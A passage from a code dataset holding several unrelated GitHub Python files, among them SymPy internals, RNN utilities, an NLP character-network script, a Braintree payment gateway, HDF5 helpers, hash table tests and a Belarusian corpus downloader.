r\"\"\"Represents unevaluated oriented additions.\n Parent class for Integral and Sum.\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, function, *symbols, **assumptions):\n from sympy.concrete.summations import Sum\n pre = _common_new(cls, function, *symbols,\n discrete=issubclass(cls, Sum), **assumptions)\n if isinstance(pre, tuple):\n function, limits, orientation = pre\n else:\n return pre\n\n obj = Expr.__new__(cls, **assumptions)\n arglist = [orientation*function] # orientation not used in ExprWithLimits\n arglist.extend(limits)\n obj._args = tuple(arglist)\n obj.is_commutative = function.is_commutative # limits already checked\n\n return obj\n\n def _eval_adjoint(self):\n if all(x.is_real for x in flatten(self.limits)):\n return self.func(self.function.adjoint(), *self.limits)\n return None\n\n def _eval_conjugate(self):\n if all(x.is_real for x in flatten(self.limits)):\n return self.func(self.function.conjugate(), *self.limits)\n return None\n\n def _eval_transpose(self):\n if all(x.is_real for x in flatten(self.limits)):\n return self.func(self.function.transpose(), *self.limits)\n return None\n\n def _eval_factor(self, **hints):\n if 1 == len(self.limits):\n summand = self.function.factor(**hints)\n if summand.is_Mul:\n out = sift(summand.args, lambda w: w.is_commutative \\\n and not set(self.variables) & w.free_symbols)\n return Mul(*out[True])*self.func(Mul(*out[False]), \\\n *self.limits)\n else:\n summand = self.func(self.function, *self.limits[0:-1]).factor()\n if not summand.has(self.variables[-1]):\n return self.func(1, [self.limits[-1]]).doit()*summand\n elif isinstance(summand, Mul):\n return self.func(summand, self.limits[-1]).factor()\n return self\n\n def _eval_expand_basic(self, **hints):\n summand = self.function.expand(**hints)\n force = hints.get('force', False)\n if (summand.is_Add and (force or summand.is_commutative and\n self.has_finite_limits is not False)):\n return Add(*[self.func(i, *self.limits) for i in summand.args])\n elif isinstance(summand, MatrixBase):\n return summand.applyfunc(lambda x: self.func(x, *self.limits))\n elif summand != self.function:\n return self.func(summand, *self.limits)\n return self\n","repo_name":"sympy/sympy","sub_path":"sympy/concrete/expr_with_limits.py","file_name":"expr_with_limits.py","file_ext":"py","file_size_in_byte":21832,"program_lang":"python","lang":"en","doc_type":"code","stars":11561,"dataset":"github-code","pt":"73"} +{"seq_id":"73766304556","text":"#label: 回溯算法 difficulty: medium\n\nimport itertools\nclass Solution:\n def numTilePossibilities(self, tiles: str) -> int:\n res=0\n n=len(tiles)\n for i in range(1,n+1):\n res+=len(set(itertools.permutations(tiles,i)))\n return res\n\n","repo_name":"Aurora-yuan/Leetcode_Python3","sub_path":"1079 活字印刷/1079 活字印刷.py","file_name":"1079 活字印刷.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"16659634688","text":"# este programa calcula a variancia de uma imagem digital\n# feito por Isaius\n\nimport numpy as np\nimport cv2\n\n# abrindo a imagem 1 em forma de matriz\nimg = cv2.imread('WashingtonDC_02.TIF', 0)\n# img.shape retorna uma tupla com (altura, largura) ou (linhas, colunas)\ndimensoes = img.shape\n# guardando as dimensoes para serem usadas para percorrer a matriz\nlargura = dimensoes[1]\naltura = dimensoes[0]\n# variaveis resultados\nmedia = 0\nsomatorio = 0\n# percorrendo a matriz pixel por pixel e somando o valor de cinza\nfor i in range(altura):\n for k in range(largura):\n somatorio += img[i, k]\n# media da imagem\nmedia = somatorio/img.size\n\nsomatorio = 0\nvariancia = 0\n\nfor i in range(altura):\n for k in range(largura):\n aux = img[i, k] - media\n somatorio += aux*aux\n\nvariancia = somatorio/(img.size-1)\n\nprint(variancia)\n\nprint(np.var(img))","repo_name":"Isaius/PDI","sub_path":"atividade01/variancia.py","file_name":"variancia.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"69911229037","text":"\nimport torch\nimport numpy as np\nimport torch.nn as nn\n\n\ndef feed_forward_rnn(rnn, embedded_sequence_batch, lengths=None, hidden_tuple=None):\n \"\"\"\n Recursive function to encapsulate RNN calls.\n :param rnn:\n :param embedded_sequence_batch:\n :param lengths:\n :param hidden_tuple:\n :return:\n \"\"\"\n if lengths is not None:\n rnn_input, indices_unsort = pack_rnn_input(embedded_sequence_batch, lengths)\n rnn_output, hidden_tuple = rnn(rnn_input, hidden_tuple)\n output = unpack_rnn_output(rnn_output, indices_unsort)\n else:\n output, hidden_tuple = rnn(embedded_sequence_batch, hidden_tuple)\n\n return output, hidden_tuple\n\n\ndef pad_sequence(sequence, batch_first=True):\n\n lengths = []\n for s in sequence:\n lengths.append(s.shape[0])\n lengths = np.array(lengths, dtype=np.float32)\n lengths = torch.from_numpy(lengths)\n\n return nn.utils.rnn.pad_sequence(sequence, batch_first=batch_first), lengths\n\ndef pack_rnn_input(embedded_sequence_batch, sequence_lengths):\n '''\n :param embedded_sequence_batch: torch.Tensor(batch_size, seq_len)\n :param sequence_lengths: list(batch_size)\n :return:\n '''\n sequence_lengths = sequence_lengths.cpu().numpy()\n\n sorted_sequence_lengths = np.sort(sequence_lengths)[::-1]\n sorted_sequence_lengths = torch.from_numpy(sorted_sequence_lengths.copy())\n\n idx_sort = np.argsort(-sequence_lengths)\n idx_unsort = np.argsort(idx_sort)\n\n idx_sort = torch.from_numpy(idx_sort)\n idx_unsort = torch.from_numpy(idx_unsort)\n\n if embedded_sequence_batch.is_cuda:\n idx_sort = idx_sort.cuda()\n idx_unsort = idx_unsort.cuda()\n\n embedded_sequence_batch = embedded_sequence_batch.index_select(0, idx_sort)\n\n # # go back to ints as requested by torch (will change in torch 0.4)\n # int_sequence_lengths = [int(elem) for elem in sorted_sequence_lengths.tolist()]\n # Handling padding in Recurrent Networks\n packed_rnn_input = nn.utils.rnn.pack_padded_sequence(embedded_sequence_batch,sorted_sequence_lengths,batch_first=True)\n return packed_rnn_input, idx_unsort\n\ndef unpack_rnn_output(packed_rnn_output, indices):\n '''\n :param packed_rnn_output: torch object\n :param indices: Variable(LongTensor) of indices to sort output\n :return:\n '''\n encoded_sequence_batch, _ = nn.utils.rnn.pad_packed_sequence(packed_rnn_output,batch_first=True)\n encoded_sequence_batch = encoded_sequence_batch.index_select(0, indices)\n\n return encoded_sequence_batch\n\ndef mean_pooling(batch_hidden_states, batch_lengths):\n '''\n :param batch_hidden_states: torch.Tensor(batch_size, seq_len, hidden_size)\n :param batch_lengths: list(batch_size)\n :return:\n '''\n\n batch_lengths = batch_lengths.unsqueeze(1)\n pooled_batch = torch.sum(batch_hidden_states, 1)\n\n pooled_batch = pooled_batch / batch_lengths.expand_as(pooled_batch).float()\n\n return pooled_batch\n\n\ndef max_pooling(batch_hidden_states, batch_lengths):\n '''\n :param batch_hidden_states: torch.Tensor(batch_size, seq_len, hidden_size)\n :return:\n '''\n pooled_batch, _ = torch.max(batch_hidden_states, 1)\n return pooled_batch\n\n\ndef gather_last(batch_hidden_states, batch_lengths, bidirectional=True):\n\n seq_len, batch_size, hidden_x_dirs = batch_hidden_states.size()\n\n if bidirectional:\n assert hidden_x_dirs % 2 == 0\n single_dir_hidden = int(hidden_x_dirs / 2)\n else:\n single_dir_hidden = int(hidden_x_dirs)\n\n batch_lengths = batch_lengths.unsqueeze(1).unsqueeze(1)\n\n fw_batch_lengths = batch_lengths - 1\n fw_batch_lengths = fw_batch_lengths.repeat(1, 1, single_dir_hidden)\n\n if bidirectional:\n bw_batch_lengths = torch.zeros(*fw_batch_lengths.size()).long()\n\n if batch_hidden_states.is_cuda:\n bw_batch_lengths = bw_batch_lengths.cuda()\n\n # we want 2 chunks in the last dimension\n out_fw, out_bw = torch.chunk(batch_hidden_states, 2, 2)\n\n h_t_fw = torch.gather(out_fw, 1, fw_batch_lengths)\n h_t_bw = torch.gather(out_bw, 1, bw_batch_lengths)\n\n # -> (batch_size, hidden_x_dirs)\n last_hidden_out = torch.cat([h_t_fw, h_t_bw], 2).squeeze(1)\n\n else:\n last_hidden_out = \\\n torch.gather(batch_hidden_states, 1, fw_batch_lengths).squeeze(1)\n\n return last_hidden_out\n","repo_name":"crodriguezo/TMLGA","sub_path":"utils/rnns.py","file_name":"rnns.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"73"} +{"seq_id":"26540623382","text":"'''\n---------------- Libraries ----------------------\n'''\n\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#NLP\nimport spacy\nnlp = spacy.load(\"en_core_web_sm\")\n\n#Edgelist\nfrom itertools import combinations\nfrom collections import Counter\n\n#Network\nimport networkx as nx\nplt.rcParams[\"figure.figsize\"] = (20,20)\n\ndef main():\n '''\n ----------------- Read data ----------------------\n '''\n\n '''\n The first thing we do is read in the csv file with our data. \n The files is located in the data folder.\n '''\n\n #Define data path\n input_file = os.path.join(\"..\", \"data\", \"pulp_fiction_dialogue.csv\")\n\n #Read data as a csv using Pandas\n data = pd.read_csv(input_file)\n\n\n '''\n ----------------- Data wrangling ----------------------\n '''\n\n '''\n The next thing we do is some simple data wrangling. \n We rename the column with the character name to avoid spaces in the name.\n Then we join the two columns with character and line. \n We do this because we want to use network analysis based on node pairs/characters appearing together .\n Therefore we need to have both the person speaking and the person being spoken to in our text.\n '''\n\n #We rename the column to avoid spaces in the name\n data = data.rename(columns = {\"Character (actual)\" : \"Character\"}, inplace = False)\n\n #Join the columns with the character and the line\n data = data.assign(United = data.Character.astype(str) + \": \" + data.Line.astype(str))\n \n '''\n ----------------- Post entities -------------\n '''\n\n '''\n The next step is to transform the text into a doc object using SpaCy.\n We are only interested in the entities with the label PERSON because we want to focus on the characters.\n Then we store the entities in a list.\n '''\n\n #Create empty list where the entities will be storred \n post_entities = []\n\n print(\"Create post entities...\")\n\n #For every line in the column United\n for line in data[\"United\"]:\n # create a temporary list\n tmp_list = []\n # create spacy doc object\n doc = nlp(line)\n # for every named entity in the doc\n for entity in doc.ents:\n # if the entity label is equal to Person(SpaCy)\n if entity.label_ == \"PERSON\":\n # append the entity to the temporary list\n tmp_list.append(entity.text)\n # add tmp_list to post_entities list\n post_entities.append(set(sorted(tmp_list)))\n\n print(\"Post entities are created!\")\n\n\n '''\n ------------------- Edgelist --------------------\n ''' \n\n '''\n The next thing we do is make an edgelist. \n The edge list contains the node pairs that appear together in the text. \n We use Itertools combinations function with 2 as our combination number. \n This means that we look for characters/nodes who perform/appear together in pairs.\n '''\n #Create empty list where the nodes will be storred \n edgelist = []\n\n print(\"Create edgelist...\")\n\n # iterate over every document in our post_entities list\n for doc in post_entities:\n # use combinations to create edgelist. We look at combinations of two nodes\n edges = list(combinations(doc,2))\n #for each combination - i.e. each pair of 'nodes'\n for edge in edges:\n # append this to edgelist\n edgelist.append(tuple(sorted(edge)))\n\n print(\"Edgelist is created!\")\n\n #Create empty list where the counted nodes will be storred \n counted_edges = []\n\n print(\"Count node pairs...\")\n\n #Count every node pair in the edgelist\n for pair, weight in Counter(edgelist).items():\n #nodeA is the value on index 0\n nodeA = pair[0]\n #nodeB is the value on index 1\n nodeB = pair[1]\n #Append the nodes and their weight to the counted_edges list\n counted_edges.append((nodeA, nodeB, weight))\n\n #Print the counted edges\n print(f\"There is: {len(counted_edges)} node pairs in the counted edges\")\n\n\n #Create data frame with the colomns: nodeA, nodeB and weight\n edges_df = pd.DataFrame(counted_edges, columns=[\"nodeA\", \"nodeB\", \"weight\"])\n\n #Create data frame with the node pairs with a weight of more than one\n filtered_df = edges_df[edges_df[\"weight\"]>1]\n\n print(f\"{len(filtered_df)} of the node pairs have a weight of more than one\")\n \n '''\n ------------------ Network -------------------\n '''\n '''\n The next step is to create and plot our network model using NetworkX.\n '''\n\n print(\"Create network based on node pair weight...\")\n\n #Create network based on the filtered edges\n network = nx.from_pandas_edgelist(filtered_df, \"nodeA\", \"nodeB\", [\"weight\"])\n\n #Define outpath for the vizualization\n outpath_viz = os.path.join(\"..\",\"output\", \"network_viz.png\")\n\n #Create and draw the vizualization \n viz = nx.nx_agraph.graphviz_layout(network, prog=\"neato\")\n nx.draw(network, viz, with_labels=True, node_size=20, font_size=10)\n\n #Save the vizualization \n plt.savefig(outpath_viz, dpi=300, bbox_inches=\"tight\")\n\n print(\"The network is created and can be found in the output folder!\")\n \n '''\n ------------------ Centrality measures ---------------\n '''\n\n print(\"Find centrality measures...\")\n\n #Find the eigenvector centrality \n ev = nx.eigenvector_centrality(network) \n #Make df with the eigenvector centrality \n ev_df = pd.DataFrame(ev.items(), columns=[\"nodeA\", \"eigenvector\"])\n\n #Find betweenness centrality\n bc = nx.betweenness_centrality(network) \n #Make df with the betweenness centrality\n bc_df = pd.DataFrame(bc.items(), columns=[\"nodeA\", \"betweenness\"]) \n\n #Merge the three data frames into one\n Centrality_measure_df = pd.merge(bc_df, ev_df, how=\"inner\", on=[\"nodeA\"])\n Centrality_measure_df = pd.merge(Centrality_measure_df, filtered_df, how=\"inner\", on=[\"nodeA\"])\n\n #Define outpath for the centrality measure data frame \n outpath_df = os.path.join(\"..\", \"output\", \"Centrality_measure.csv\") \n #Save the merged data frame as a csv in the output folder \n Centrality_measure_df.to_csv(outpath_df)\n \n #Create data frame for the number of spoken lines per character\n spoken_lines = pd.DataFrame(data[\"Character\"].value_counts())\n #Define outpath for the data frame\n lines_out = os.path.join(\"..\", \"output\", \"Spoken_lines.csv\")\n #Save the data frame\n spoken_lines.to_csv(lines_out)\n \n print(\"The centrality measures are located in the output folder!\")\n \n \n#Define behaviour when called from command line\nif __name__ == \"__main__\":\n main()","repo_name":"JohanneBW/cds_language_assignments","sub_path":"Project/src/PulpFiction_network.py","file_name":"PulpFiction_network.py","file_ext":"py","file_size_in_byte":6831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"31693751396","text":"from django.conf import settings\nfrom app.gateway import Gateway, TransactionProblem\nfrom app.models import MerchantTransaction\nimport braintree\n\n\nclass BraintreePaymentsGateway(Gateway):\n\n def __init__(self):\n if self.test_mode:\n env = braintree.Environment.Sandbox\n else:\n env = braintree.Environment.Production\n merchant_settings = getattr(settings, \"MERCHANT_SETTINGS\")\n if not merchant_settings or \\\n not merchant_settings.get(\"braintree_payments\"):\n\n raise GatewayNotConfigured(\"The '%s' gateway is not correctly \"\n \"configured.\" % self.display_name)\n braintree_settings = merchant_settings['braintree_payments']\n braintree.Configuration.configure(\n env,\n braintree_settings['MERCHANT_ACCOUNT_ID'],\n braintree_settings['PUBLIC_KEY'],\n braintree_settings['PRIVATE_KEY']\n )\n\n def find_transaction(self, transaction_id):\n \"\"\"\n Find a transaction, given a transaction_id. This does not return\n a result object. This will raise a :class:`NotFoundError ` if the provided\n credit_card_id is not found. ::\n \"\"\"\n return braintree.Transaction.find(transaction_id)\n\n def create_transaction(self, user, cardholder_name, amount, number,\n month, year, cvv):\n \"\"\"\n Create a purchase with the provided Credit Card and stores the \n Transaction result in the table Transaction\n \"\"\"\n result = braintree.Transaction.sale({\n \"amount\": amount,\n \"credit_card\": {\n \"cardholder_name\": cardholder_name,\n \"number\": number,\n \"expiration_month\": month,\n \"expiration_year\": year,\n \"cvv\": cvv,\n }\n })\n if result.is_success:\n transaction = MerchantTransaction.objects.create(\n merchant_id=result.transaction.id,\n user=user,\n amount=amount,\n gateway='braintree',\n status='success',\n response=result.transaction\n )\n elif result.transaction:\n transaction = MerchantTransaction.objects.create(\n merchant_id=result.transaction.id,\n user=user,\n amount=amount,\n gateway='braintree',\n status='failure',\n message=result.message,\n response=result.transaction\n )\n else:\n print(\"message: \" + result.message)\n for error in result.errors.deep_errors:\n print(\"attribute: \" + error.attribute)\n print(\" code: \" + error.code)\n print(\" message: \" + error.message)\n raise TransactionProblem(\"We had a problem with your transaction\")\n return transaction\n","repo_name":"marton987/django-gateway","sub_path":"django_gateway/app/gateways/braintree_payments_gateway.py","file_name":"braintree_payments_gateway.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5009696609","text":"resize_dims = (1400, 788)\n\nnormalize_image = {\n \"type\": \"Normalize\",\n \"mean\": [96.56215221, 98.2655526, 94.69506836],\n \"std\": [31.36219647, 34.50400645, 33.31346927],\n \"to_rgb\": True,\n}\n\nresize_image = {\"type\": \"Resize\", \"img_scale\": resize_dims, \"keep_ratio\": False}\n\npad_image = {\"type\": \"Pad\", \"size_divisor\": 32}\n\ntrain_pipeline = [\n {\"type\": \"LoadImageFromFile\"},\n {\"type\": \"LoadAnnotations\", \"with_bbox\": True},\n {\"type\": \"RandomFlip\", \"flip_ratio\": 0.5},\n resize_image,\n normalize_image,\n pad_image,\n {\"type\": \"DefaultFormatBundle\"},\n {\"type\": \"Collect\", \"keys\": [\"img\", \"gt_bboxes\", \"gt_labels\"]},\n]\n\ntest_pipeline = [\n {\"type\": \"LoadImageFromFile\"},\n {\n \"type\": \"MultiScaleFlipAug\",\n \"img_scale\": resize_dims,\n \"flip\": False,\n \"transforms\": [\n resize_image,\n {\"type\": \"RandomFlip\"},\n normalize_image,\n pad_image,\n {\"type\": \"ImageToTensor\", \"keys\": [\"img\"]},\n {\"type\": \"Collect\", \"keys\": [\"img\"]},\n ],\n },\n]\n\ndata = {\n \"samples_per_gpu\": 2,\n \"workers_per_gpu\": 2,\n \"train\": {\n \"type\": \"VisDroneDataset\",\n \"ann_file\": None,\n \"img_prefix\": \"VisDrone2019-DET-train/images\",\n \"pipeline\": train_pipeline,\n },\n \"val\": {\n \"type\": \"VisDroneDataset\",\n \"ann_file\": None,\n \"img_prefix\": \"VisDrone2019-DET-val/images\",\n \"pipeline\": test_pipeline,\n },\n \"test\": {\n \"type\": \"VisDroneDataset\",\n \"ann_file\": None,\n \"img_prefix\": \"VisDrone2019-DET-val/images\",\n \"pipeline\": test_pipeline,\n },\n}\nworkflow = [(\"train\", 1)]\n","repo_name":"andersonvc/mmdet-visdrone","sub_path":"configs/_base_/datasets/visdrone_dataset.py","file_name":"visdrone_dataset.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"10234174099","text":"import csv\nimport json\nimport torch\nimport h5py\nfrom collections import OrderedDict\n\ndef to_tensor(rv: dict):\n \"\"\"\n Convert scalar-type parameters to a torch.Tensor.\n rv: dictionary (param name) -> (param value)\n \"\"\"\n for name, param in rv.items():\n if isinstance(param, dict):\n rv[name] = to_tensor(param)\n\n if isinstance(param, int) or isinstance(param, float) or isinstance(param, list):\n rv[name] = torch.tensor(param)\n return rv\n\nclass StoreGraph:\n def __init__(self, V: int, K:int, edges: dict, product: dict, outside_state: str=\"OUTSIDE\", init_state: str=\"INIT\", checkout_state: str=\"CHECKOUT\") -> None:\n self.V = V\n self.K = K\n nodes = edges.keys()\n self.node2idx = OrderedDict({node: i for i, node in enumerate(nodes)})\n self.adj = torch.zeros(self.V, self.V).long()\n self.product_mat = torch.zeros(self.V, self.K)\n for vi in nodes:\n vi_idx = self.node2idx[vi]\n for vj in edges[vi]:\n vj_idx = self.node2idx[vj]\n self.adj[vi_idx, vj_idx] = 1\n for pj in product[vi]:\n # pj_idx = self.product2idx[pj]\n pj_idx = pj\n self.product_mat[vi_idx, pj_idx] = 1\n\n self.outside_state = outside_state\n self.init_state = init_state\n self.checkout_state = checkout_state\n\n @property\n def outside(self):\n return self.node2idx[self.outside_state]\n \n @property\n def init(self):\n return self.node2idx[self.init_state]\n\n @property\n def checkout(self):\n return self.node2idx[self.checkout_state]\n \ndef create_graph_and_product(cfg_path, V, K):\n edges, product = {}, {}\n with open(cfg_path, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in reader:\n edges[row[0]] = row[1].split('-')\n p = row[2].split('-')\n if p[0] == '': \n product[row[0]] = []\n else: \n product[row[0]] = list(map(int, p))\n g = StoreGraph(V, K, edges, product)\n return g\n\n\ndef save_h5py(save_path, config, config_bytes, train_data, val_data):\n # save dataset\n h5f = h5py.File(save_path, 'w')\n\n group_config = h5f.create_group('config')\n group_config.create_dataset('config_file', data=config_bytes)\n\n group_data = h5f.create_group('train_data')\n group_data.create_dataset('a_ikt', (config['T_max'], config['N'], config['K']), data=train_data['a_ikt'], dtype=float)\n group_data.create_dataset('x_it', (config['T_max'], config['N']), data=train_data['x_it'], dtype=int)\n group_data.create_dataset('rho_jt', (config['T_max'], config['V']), data=train_data['rho_jt'], dtype=float)\n group_data.create_dataset('T_0', (config['N'],), data=train_data['T_0'], dtype=int)\n group_data.create_dataset('H_it', (config['T_max'], config['N']), data=train_data['H_it'], dtype=int)\n group_data.create_dataset('S_it', (config['T_max'], config['N']), data=train_data['S_it'], dtype=int)\n group_data.create_dataset('B_ikt', (config['T_max'], config['N'], config['K']), data=train_data['B_ikt'], dtype=int)\n\n group_data = h5f.create_group('val_data')\n group_data.create_dataset('a_ikt', (config['T_max'], config['N'], config['K']), data=val_data['a_ikt'], dtype=float)\n group_data.create_dataset('x_it', (config['T_max'], config['N']), data=val_data['x_it'], dtype=int)\n group_data.create_dataset('rho_jt', (config['T_max'], config['V']), data=val_data['rho_jt'], dtype=float)\n group_data.create_dataset('T_0', (config['N'],), data=val_data['T_0'], dtype=int)\n group_data.create_dataset('H_it', (config['T_max'], config['N']), data=val_data['H_it'], dtype=int)\n group_data.create_dataset('S_it', (config['T_max'], config['N']), data=val_data['S_it'], dtype=int)\n group_data.create_dataset('B_ikt', (config['T_max'], config['N'], config['K']), data=val_data['B_ikt'], dtype=int)\n\n h5f.close()\n\ndef load_h5py(load_path):\n h5f = h5py.File(load_path, 'r')\n\n # Read the binary data from the dataset and convert it to a JSON object\n cfg = h5f['config']\n config = json.loads(cfg['config_file'][()])\n # Read the tensor data\n # dataset = h5f['dataset']['a_ikt']\n dataset_names = [\"x_it\", \"a_ikt\", \"rho_jt\", \"T_0\", \"H_it\", \"S_it\", \"B_ikt\"]\n train_data = { name: torch.tensor(h5f['train_data'][name][:]) for name in dataset_names }\n val_data = { name: torch.tensor(h5f['val_data'][name][:]) for name in dataset_names }\n # Close the file\n h5f.close()\n\n return dict(config=config, train_data=train_data, val_data=val_data)","repo_name":"take-koshizuka/Shopping-path-analysis","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23936606545","text":"import pytest\nfrom hash_table.hash_table import Hashtable\nfrom hash_table.repeated_word import repeated_word\n\n\ndef test_set_and_get():\n ht = Hashtable()\n ht.set(\"key1\", \"value1\")\n assert ht.get(\"key1\") == \"value1\"\n\n\ndef test_set_replaces_existing_key():\n ht = Hashtable()\n ht.set(\"key1\", \"value1\")\n ht.set(\"key1\", \"value2\")\n assert ht.get(\"key1\") == \"value2\"\n\n\ndef test_get_nonexistent_key():\n ht = Hashtable()\n assert ht.get(\"key1\") is None\n\n\ndef test_has_existing_key():\n ht = Hashtable()\n ht.set(\"key1\", \"value1\")\n assert ht.has(\"key1\") is True\n\n\ndef test_has_nonexistent_key():\n ht = Hashtable()\n assert ht.has(\"key1\") is False\n\n\ndef test_keys():\n ht = Hashtable()\n ht.set(\"key1\", \"value1\")\n ht.set(\"key2\", \"value2\")\n ht.set(\"key3\", \"value3\")\n keys = ht.keys()\n assert \"key1\" in keys\n assert \"key2\" in keys\n assert \"key3\" in keys\n assert len(keys) == 3\n\n\ndef test_collision_handling():\n ht = Hashtable(size=1) # Force collision with a small size\n ht.set(\"key1\", \"value1\")\n ht.set(\"key2\", \"value2\")\n assert ht.get(\"key1\") == \"value1\"\n assert ht.get(\"key2\") == \"value2\"\n\n\ndef test_retrieve_collision_value():\n ht = Hashtable(size=1) # Force collision with a small size\n ht.set(\"key1\", \"value1\")\n ht.set(\"key2\", \"value2\")\n assert ht.get(\"key1\") == \"value1\"\n assert ht.get(\"key2\") == \"value2\"\n\n\ndef test_hash():\n ht = Hashtable()\n assert ht.hash(\"key1\") >= 0\n assert ht.hash(\"key1\") < ht.size\n\ndef test_repeated_word():\n assert repeated_word(\"Once upon a time, there was a brave princess who...\") == \"a\"\n assert repeated_word(\"It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness...\") == \"it\"\n assert repeated_word(\"It was a queer, sultry summer, the summer they electrocuted me, and I didn’t realize I was dead yet...\") == \"summer\"\n\ndef test_repeated_word_no_repeats():\n assert repeated_word(\"\") is None\n assert repeated_word(\"Saif Obeidat\") is None\n assert repeated_word(\"Saif Obeidat Saif Obeidat\") == \"saif\"\n\n\n# Run the tests\npytest.main([\"-v\"])","repo_name":"saifobe/data-structures-and-algorithms","sub_path":"hash_table/tests/test_hash.py","file_name":"test_hash.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3834083217","text":"import insightconnect_plugin_runtime\nfrom .schema import PublishInput, PublishOutput\n\n# Custom imports below\n\n\nclass Publish(insightconnect_plugin_runtime.Action):\n def __init__(self):\n super(self.__class__, self).__init__(\n name=\"publish\",\n description=\"Publish an event\",\n input=PublishInput(),\n output=PublishOutput(),\n )\n\n def run(self, params={}):\n event = params.get(\"event\")\n\n client = self.connection.client\n in_event = client.get_event(event)\n published = client.publish(in_event, True)\n try:\n published[\"id\"]\n except KeyError:\n self.logger.error(\"Something went wrong see returned request, %s\", published)\n raise\n return {\"published\": published}\n","repo_name":"rapid7/insightconnect-plugins","sub_path":"plugins/misp/komand_misp/actions/publish/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"73"} +{"seq_id":"15546746718","text":"import re\nimport os\nimport string\nfrom gensim import utils\nfrom gensim.parsing.preprocessing import strip_punctuation, strip_short, strip_numeric, strip_multiple_whitespaces, remove_stopwords\nimport urllib.request\nimport zipfile\nimport lzma\nimport shutil\nimport xml.dom.minidom\nimport json\nfrom itertools import islice\n\nimport logging\nlogging.basicConfig(level=logging.INFO, force = True)\nlogger = logging.getLogger()\nlogger.info(\"Logging initialized\")\n\n\ndef exists_nonempty_file(filename):\n return os.path.exists(filename) and os.path.getsize(filename) > 0\n\n\ndef corpus_downloaded():\n return exists_nonempty_file('be.txt')\n\n\ndef download_corpus():\n # Original file found here: https://metatext.io/datasets/cc100-belarusian\n urllib.request.urlretrieve('https://belarus-embedding.s3.eu-central-1.amazonaws.com/be.txt.xz',\n 'be.txt.xz')\n with lzma.open(\"be.txt.xz\", \"rb\") as fsrc:\n with open(\"be.txt\", \"wb\") as fdst:\n shutil.copyfileobj(fsrc, fdst)\n\n\ndef grammar_downloaded():\n return exists_nonempty_file('GrammarDB-master/N3.xml')\n\n\ndef download_grammar():\n urllib.request.urlretrieve('https://github.com/Belarus/GrammarDB/archive/refs/heads/master.zip',\n 'GrammarDB.zip')\n with zipfile.ZipFile('GrammarDB.zip', 'r') as zip_ref:\n zip_ref.extractall('.')\n\n\nBASE_FORM_BLACKLIST = [\n 'як', # can mean 'bull', but mostly used as particle\n 'і' # for some reason listed as noun\n] + [chr(ord('а')+delta) for delta in range(0, 32)] # alphabet letters\n\nDERIVED_FORM_BLACKLIST = [\n 'але', # can mean geographic place 'Ала', but mostly used as particle 'але'\n 'калі', # weird form of 'калій' - 'каль', but used as particle 'калі'\n 'вось', # can mean 'axis', but mostly used as particle\n 'нам', # can mean short form of 'намеснік', but mostly used as pronoun 'мы'\n 'наша', # some weird noun 'наша', but mostly used as pronoun 'мы'\n 'нашы', # can be used as noun, but motly used as pronoun 'мы'\n 'яму' # can be used as rare noun 'ям', but mostly used as pronoun 'ён'\n]\n\n\ndef calculate_mapping_from_forms_to_base(filepath, tag_prefixes=[]):\n xml_doc = xml.dom.minidom.parse(filepath)\n paradigms = xml_doc.getElementsByTagName('Paradigm')\n result = {}\n collision_count = 0\n collisions = set()\n for paradigm in paradigms:\n tag = paradigm.getAttribute('tag')\n if len(tag_prefixes) == 0 or any([tag.startswith(p) for p in tag_prefixes]):\n variants = paradigm.getElementsByTagName('Variant')\n for variant in variants:\n base = variant.getAttribute('lemma').replace(\"+\", \"\").lower()\n if base not in BASE_FORM_BLACKLIST:\n forms = variant.getElementsByTagName('Form')\n local_map = {}\n citation_count = max([form.getAttribute('slouniki').count(',') for form in forms]) + 1\n for form in forms:\n if len(form.childNodes) > 0:\n word = form.childNodes[0].data.replace(\"+\", \"\").lower()\n local_map[word] = (base, citation_count)\n for k, v in local_map.items():\n if k in result:\n if result[k][1] == v[1] and result[k][0] != v[0]:\n collision_count += 1\n collisions.add(v[0])\n collisions.add(result[k][0])\n elif result[k][1] < v[1]:\n result[k] = v\n else:\n result[k] = v\n logger.info(\n f\"Collisions (forms leading to different base word, and having same amount of citation): {collision_count}\")\n logger.info(f\"Examples of collisions: {list(islice(collisions, 5))}\")\n for k in result:\n result[k] = result[k][0]\n return result\n\n\ndef generate_word_mapping(filename, verbs=True, adjectives=True):\n word_map = {}\n if verbs:\n v = calculate_mapping_from_forms_to_base('GrammarDB-master/V.xml')\n word_map.update(v)\n\n nprop = calculate_mapping_from_forms_to_base('GrammarDB-master/NP.xml', ['NPII'])\n word_map.update(nprop)\n\n n1 = calculate_mapping_from_forms_to_base('GrammarDB-master/N1.xml')\n n2 = calculate_mapping_from_forms_to_base('GrammarDB-master/N2.xml')\n n3 = calculate_mapping_from_forms_to_base('GrammarDB-master/N3.xml')\n word_map.update(n1)\n word_map.update(n2)\n word_map.update(n3)\n\n if adjectives:\n adj1 = calculate_mapping_from_forms_to_base('GrammarDB-master/A1.xml', ['ARP', 'AQP'])\n adj2 = calculate_mapping_from_forms_to_base('GrammarDB-master/A2.xml', ['ARP', 'AQP'])\n 